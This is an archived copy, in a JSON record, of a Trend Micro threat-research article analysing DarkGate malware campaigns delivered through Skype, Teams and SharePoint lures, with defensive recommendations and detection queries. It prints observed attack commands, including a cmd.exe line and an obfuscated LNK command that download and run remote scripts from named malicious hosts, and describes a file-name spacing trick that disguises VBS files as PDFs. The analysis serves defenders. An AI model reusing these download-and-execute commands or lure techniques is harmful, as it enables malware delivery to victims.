{
	"id": "ecd26b1b-f656-4282-9058-e33e44c2cc09",
	"created_at": "2026-04-06T00:20:52.620489Z",
	"updated_at": "2026-04-10T13:12:13.857895Z",
	"deleted_at": null,
	"sha1_hash": "3579f44ba76afc230567858066c7a7eb2dde0533",
	"title": "DarkGate Opens Organizations for Attack via Skype, Teams",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1701726,
	"plain_text": "DarkGate Opens Organizations for Attack via Skype, Teams\r\nBy Trent Bessell, Ryan Maglaque, Aira Marcelo, David Walsh, Francesca Villasanta ( words)\r\nPublished: 2023-10-12 · Archived: 2026-04-05 23:42:43 UTC\r\nFrom July to September, we observed the DarkGatenews article campaign (detected by Trend Micro as\r\nTrojanSpy.AutoIt.DARKGATE.AA) abusing instant messaging platforms  to deliver a VBA loader script to\r\nvictims. This script downloaded and executed a second-stage payload consisting of a AutoIT scripting containing\r\nthe DarkGate malware code. It’s unclear how the originating accounts of the instant messaging applications were\r\ncompromised, however is hypothesized to be either through leaked credentials available through underground\r\nforums or the previous compromise of the parent organization.\r\nDarkGate has not been very active in the past couple of years. However, this year we have observed multiple\r\ncampaign deployments, as reported by Truesec and MalwareBytesnews article. Upon closely monitoring this\r\ncampaign, we observed that most of DarkGate attacks were detected in the Americas region, followed closely by\r\nthose in Asia, the Middle East, and Africa. \r\nFigure 1. Distribution of DarkGate campaign from August to September 2023\r\nBackground\r\nDarkGate is classified as a commodity loader that was first documented in late 2017. Versions of DarkGate have\r\nbeen advertised on Russian language forum eCrime since May 2023. Since then, an increase in the number of\r\ninitial entry attacks using the malware has been observed.\r\nhttps://www.trendmicro.com/en_us/research/23/j/darkgate-opens-organizations-for-attack-via-skype-teams.html\r\nPage 1 of 11\n\nDarkGate has various features, including the ability to perform the following actions:\r\nExecute discovery commands (including directory traversal)\r\nSelf-update and self-manage\r\nImplement remote access software (such as remote desktop protocol or RDP, hidden virtual network\r\ncomputing or hVNC, and AnyDesk)\r\nEnable cryptocurrency mining functionality (start, stop, and configure)\r\nPerform keylogging\r\nSteal information from browsers\r\nPrivilege escalation\r\nDarkGate also uses a Windows-specific automation and scripting tool called AutoIt to deliver and execute its\r\nmalicious capabilities. Despite being a legitimate tool, AutoIt has been frequently abused by other malware\r\nfamilies for defense evasion and an added obfuscation layer. Historically, however, none of the notable loaders\r\nlike IcedID, Emotet, or Qakbot have been observed to abuse it,making it easier for researchers or security teams to\r\nlink the activity to the malware campaign.\r\nComparing this latest variant of DarkGate with a sample also abusing AutoIt in 2018, we observed that the routine\r\nappears to have changed slightly in terms of the initial stager and the addition of obfuscation to its command lines.\r\nThe infection chain, however, largely remains the same.\r\nAttack overview\r\nFrom this sample we studied, the threat actor abused a trusted relationship between the two organizations to\r\ndeceive the recipient into executing the attached VBA script. Access to the victim’s Skype account allowed the\r\nactor to hijack an existing messaging thread and craft the naming convention of the files to relate to the context of\r\nthe chat history.\r\nhttps://www.trendmicro.com/en_us/research/23/j/darkgate-opens-organizations-for-attack-via-skype-teams.html\r\nPage 2 of 11\n\nThe victims received a message from a compromised Skype account, with the message containing a deceptive\r\nVBS script with a file name following the following format: \u003cfilename.pdf\u003e www.skype[.]vbs. The spacing in the\r\nfile name tricks the user into believing the file is a .PDF document while hiding the real format as\r\nwww.skype[.]vbs. In this sample we studied, the recipient knew the sender as someone who belonged to a trusted\r\nexternal supplier.\r\nhttps://www.trendmicro.com/en_us/research/23/j/darkgate-opens-organizations-for-attack-via-skype-teams.html\r\nPage 3 of 11\n\nFigure 3. Skype message with an embedded malicious attachment posing as a PDF file.\r\nThe VBA script, once executed by the victim, begins by creating a new folder named “\u003cRandom Char \u003e”, then\r\ncopies the legitimate curl.exe with same name of the directory created as \u003cRandom Char\u003e.exe. The script then\r\ndownloads the AutoIt3 executable and .AU3 script from an external server hosting the files.\r\nFigure 4. Example of VBA script content; the VBA scripts acts as the downloader for two files: a\r\nlegitimate copy of the AutoIt executable and a maliciously complied .au3 script.\r\nTrend Vision One™ detected the loading of the VBA script via its execution using the Windows native\r\nwscript.exe. The script created the \u003cRandom Char\u003e directory and copied curl.exe to \u003cRandom Char\u003e.exe.\r\nhttps://www.trendmicro.com/en_us/research/23/j/darkgate-opens-organizations-for-attack-via-skype-teams.html\r\nPage 4 of 11\n\nLooking at Trend Vision One’s RCA, we can observe that the curl command was used to retrieve the legitimate\r\nAutoIt application and the associated malicious fIKXNA.au3 (.au3 representing a AutoIt Version 3 script file).\r\nCurl was executed via cmd.exe with the following parameters to retrieve two files from the remote hosting server:\r\nC:\\Windows\\System32\\cmd.exe\" /c mkdir c:\\zohn \u0026 cd /d c:\\zohn \u0026 copy C:\\windows\\system32\\curl.exe zohn.exe\r\n\u0026 zohn -o Autoit3.exe hxxp://reactervnamnat[.]com:80 \u0026 zohn -o BzpXNT.au3\r\nhxxp://reactervnamnat[.]com:80/msimqrqcjpz \u0026 Autoit3.exe BzpXNT.au3\r\nIn another sample, the threat was observed sending a link via a Microsoft Teams message. In this case, the\r\norganization’s system allowed the victim to receive messages from external users, which resulted in them\r\nbecoming a potential target of spam. Researchers from Truesec documentednews article a similar DarkGate\r\ntechnique in early September. While the Skype routine masqueraded the VBS file as a PDF document, in the\r\nTeams version of compromise, the attackers concealed a .LNK file instead. Moreover, the sample that abused\r\nTeams came from an unknown, external sender.\r\nhttps://www.trendmicro.com/en_us/research/23/j/darkgate-opens-organizations-for-attack-via-skype-teams.html\r\nPage 5 of 11\n\nWe also observed a tertiary delivery method of the VBA script wherein a .LNK file arrives in a compressed file\r\nfrom the originators’ SharePoint site. The victim is lured to navigate the SharePoint site given and download the\r\nfile named “Significant company changes September.zip”.\r\nThe .ZIP file contains the following .LNK files posing as a PDF document:\r\nCompany_Transformations.pdf.lnk\r\nRevamped_Organizational_Structure.pdf.lnk\r\nPosition_Guidelines.pdf.lnk\r\nFresh_Mission_and_Core_Values.pdf.lnk\r\nEmployees_Affected_by_Transition.pdf.lnk\r\nUsing conditional execution, the accompanying command will only execute if the previous command fails. The\r\nLNK file contains the following command:\r\n\"C:\\Windows\\System32\\cmd.exe\" /c hm3 || EChO hm3 \u0026 PIN\"G\" hm3 || cURl\r\nh\"t\"t\"p\":\"//\"1\"85.39\".1\"8\".17\"0\"/m\"/d\"2\"J\" -o C:\\Users\\\u003cUSER\u003e\\AppData\\Local\\Temp\\hm3.vbs \u0026 PIN\"G\" -n 4\r\nhm3 || c\"sCR\"i\"Pt\" C:\\Users\\\u003cUSER\u003e\\AppData\\Local\\Temp\\hm3.vbs \u0026 e\"XI\"t 'HlnLEG=OcCQmmcm\r\nOnce successful, a loaderVBA script is downloaded and executed (hm3.vbs). The VBA script will proceed to copy\r\nand rename curl.exe from the System32 directory as “\u003cRandom Char\u003e.exe”, and the curl command will be used to\r\nretrieve Autoit3.exe and the associated malicious DarkGate code.\r\nhttps://www.trendmicro.com/en_us/research/23/j/darkgate-opens-organizations-for-attack-via-skype-teams.html\r\nPage 6 of 11\n\nDarkGate AU3 script\r\nThe downloaded artifacts contained both legitimate copy of AutoIt and a maliciously compiled AutoIt script file\r\nthat contained the malicious capabilities of DarkGate. The AU3 file first performs the following checks before\r\nloading the script. If any of the following conditions  are not met, the script is terminated:\r\nWhen the existence of %Program Files% is confirmed\r\nWhen the username scanned is not “SYSTEM”\r\nOnce the environmental checks are complete, the program searches for a file with the \".au3\" extension to decrypt\r\nand execute the DarkGate payload. If the .AU3 file cannot be loaded, the program displays an error message box\r\nand terminates the execution.\r\nAfter successfully executing the .AU3 file, the file spawns surrogate processes located in C:\\Program Files (x86)\\.\r\nThese processes include iexplore.exe, GoogleUpdateBroker.exe, and Dell.D3.WinSvc.UILauncher.exe. These are\r\ninjected with shellcode to execute the DarkGate payload in memory.\r\nThe malware achieves persistence by dropping a randomly named LNK file to the Windows User Startup folder,\r\nenabling automatic execution of the file at every system startup, following this path\r\n\u003cC:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\u003crandom\u003e.lnk\u003e\r\nIn addition the execution creates a folder on the host within the Program Data directory using a randomly\r\ngenerated seven-character string to store log and configuration data. To help aid in the investigation of the\r\nDarkGate payload and processes, a tool by Telekom Security can be used to dump the config file.\r\nTable 1. Storing log and configuration data\r\nFile path Details\r\nhttps://www.trendmicro.com/en_us/research/23/j/darkgate-opens-organizations-for-attack-via-skype-teams.html\r\nPage 7 of 11\n\n%ProgramData%\\{Generated 7 Characters}\\{Generated 7 Characters for\r\nlogsfolder}\\{date}.log\r\nEncrypted key logs\r\n%ProgramData%\\{Generated 7 Characters}\\{Generated 7 Characters for\r\nlogsfolder}\\{Generated 7 Characters for \"settings\"}\r\nEncrypted malware\r\nsettings\r\nFigure 8. Snippet of the .AU3 script\r\nFigure 9. Extracted configuration\r\nPost-installation activities\r\nhttps://www.trendmicro.com/en_us/research/23/j/darkgate-opens-organizations-for-attack-via-skype-teams.html\r\nPage 8 of 11\n\nThe threat was observed acting as a downloader of additional payloads. Post-installation of the DarkGate\nmalware, it dropped files in the and \u003c%appdata%/Adobe/\u003e directories, which helps in its attempt to\nmasquerade itself.\nThe dropped files were detected as variants of either DarkGate or Remcos, potentially as a means to strengthen the\nattackers’ foothold in the infected system. Here are some of the sample file names we found for these additional\npayloads:\nFolkevognsrugbrd.exe\nlogbackup_0.exe\nsdvbs.exe\nVaabenstyringssystem.exe\nSdvaners.exe\nDropper.exe\nConclusion and recommendations\nIn this case study, the attack was detected and contained before the actor could achieve their objectives. However,\nwe’ve noted that given the attacker's previous pivot to advertising and leasing DarkGate, the objectives of the\nattacker might vary, depending on the affiliates involved. Cybercriminals can use these payloads to infect systems\nwith various types of malware, including info stealers, ransomware, malicious and/or abused remote management\ntools, and cryptocurrency miners.\nIn the main case discussed, the Skype application was legitimately used to communicate with third-party\nsuppliers,making it easier to penetrate and/or lure the users in accessing the malicious file. The recipient was just\nthe initial target to gain a foothold in the environment. The goal is still to penetrate the whole environment, and\ndepending on the threat group that bought or leased the DarkGate variant used, the threats can vary from\nransomware to cryptomining. From our telemetry, we have seen DarkGate leading to tooling being detected\ncommonly associated with the Black Basta ransomware group.\nhttps://www.trendmicro.com/en_us/research/23/j/darkgate-opens-organizations-for-attack-via-skype-teams.html\nPage 9 of 11\n\nAs long as external messaging is allowed, or abuse of trusted relationships via compromised accounts is\r\nunchecked, then this technique for initial entry can be done to and with any instant messaging (IM) apps. The\r\nintroduction of any new application to an organization should be accompanied by measures for securing and\r\nlimiting that organization’s attack surface. In this case, IM applications should be controlled by the organization to\r\nenforce rules such as blocking external domains, controlling attachments, and, if possible, implementing scanning.\r\nMultifactor authentication (MFA) is highly recommended to secure applications (including IM ones) in case of\r\nvalid credentials’ compromise. This limits the potential proliferation of threats using these means.\r\nApplication allowlisting is a good defense mechanism to deploy to hosts through policies and ensures that end\r\nusers can only access and execute certain applications. In this instance, the AutoIt application is rarely required to\r\nbe resident or run on end-user machines.\r\nAlthough the arrival vector of the threat is nothing new, it shows that cybersecurity should start as left of attacks\r\nand infection routines as possible. Regardless of rank, organizations should regularly conduct and implement\r\ninformative methods to continuously raise user security awareness among employees during training.  More\r\nimportantly, the aim is to empower people to recognize and protect themselves against the latest threats. Hijacked\r\nthreads, either via email or instant message, rely on the recipient believing that the sender is who they say they are\r\nand therefore can be trusted.  Empowering users to question this trust and to remain vigilant can therefore be an\r\nimportant factor in raising security awareness and confidence.\r\nThis case highlights the importance of in-depth, 24/7 monitoring, defense, and detection via Trend Micro™\r\nManaged XDRservices, included in Trend Service One™services,as the responsiveness of our security analysts to\r\ndetect and contain threats from progressing to high severity compromise plays an important role in shifting tactics,\r\ntechniques, and procedures (TTPs). Organizations should also consider Trend Vision One™one-platform, which\r\noffers the ability to detect and respond to threats across multiple security layers. It can isolate endpoints, often the\r\nsource of infection, until they are fully cleaned, or until the investigation is done.the investigation is done.\r\nFor Trend Vision One customers, here are some of the Vision One search queries for DarkGate:\r\nprocessFilePath:wscript.exe AND objectFilePath:cmd.exe AND objectCmd:(au3 OR autoit3.exe OR curl)\r\nAND eventSubId: 2\r\n\"cmd.exe\" spawns \"curl.exe\", which will retrieve the legitimate AutoIt application and the associated malicious\r\n.au3 (.au3 representing a AutoIt Version 3 script file). From the query eventSubId: “2” indicates\r\nTELEMETRY_PROCESS_CREATE\r\nparentFilePath:cmd.exe AND processFilePath:curl.exe AND processCmd:*http* AND objectFilePath:*vbs\r\nAND eventSubId:101\r\nCheck for any VBScript download via curl. From the query, “eventSubId: 101” indicates\r\nTELEMETRY_FILE_CREATE\r\nIndicators of Compromise (IOCs)\r\nDownload the indicators here.\r\nhttps://www.trendmicro.com/en_us/research/23/j/darkgate-opens-organizations-for-attack-via-skype-teams.html\r\nPage 10 of 11\n\nTags\r\nSource: https://www.trendmicro.com/en_us/research/23/j/darkgate-opens-organizations-for-attack-via-skype-teams.html\r\nhttps://www.trendmicro.com/en_us/research/23/j/darkgate-opens-organizations-for-attack-via-skype-teams.html\r\nPage 11 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/23/j/darkgate-opens-organizations-for-attack-via-skype-teams.html"
	],
	"report_names": [
		"darkgate-opens-organizations-for-attack-via-skype-teams.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434852,
	"ts_updated_at": 1775826733,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3579f44ba76afc230567858066c7a7eb2dde0533.pdf",
		"text": "https://archive.orkl.eu/3579f44ba76afc230567858066c7a7eb2dde0533.txt",
		"img": "https://archive.orkl.eu/3579f44ba76afc230567858066c7a7eb2dde0533.jpg"
	}
}